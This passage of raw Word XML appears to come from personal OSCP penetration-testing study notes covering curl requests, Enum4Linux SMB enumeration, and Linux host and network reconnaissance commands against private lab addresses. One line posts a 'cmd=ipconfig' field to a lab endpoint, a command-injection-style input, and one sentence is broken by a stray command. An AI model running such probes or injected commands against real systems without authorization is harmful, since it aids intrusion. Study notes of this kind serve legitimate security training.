        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o [localfile] [WEBSITE_URL]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add JSON content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add parameters and arguments to the POST request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST --data 'cmd=ipconfig' http://192.168.50.189:8000/archive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="766"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the burpsuite, on the bottom, the HTTP payload would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="766"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd=ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029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E9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_womrfu1wl49g" w:id="363"/>
      <w:bookmarkEnd w:id="363"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enum4Linux (external enumeration tool)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY IMPORTANT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Contrary to the name, Enum4Linux is a tool built for Linux Users to enumerate against WINDOWS machines (running SMB). And also Linux machines running Samba. This is not a tool to just be run randomly against Linux Machines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enum4linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">external enumeration tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— it's not something you run on the target; you run it agaienum4linux 192.168.210.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">st the target from your own machine (for example, your Kali box or attack VM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux 192.168.210.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029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F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zdj1xoj5t9xv" w:id="364"/>
      <w:bookmarkEnd w:id="364"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 18.1.2. Manual Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4595813" cy="3672500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="337" name="image322.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image322.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId873"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4595813" cy="3672500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/issue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/os-release</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Process enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64 is better though!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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07">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sfrxhkmlmvd3" w:id="365"/>
      <w:bookmarkEnd w:id="365"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A09">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 18.1.2. Manual Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interface and IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">routel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A12">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -anp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">= All sockets, all protocols, all states (not just listening), with process info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="604"/>
        </w:numPr>
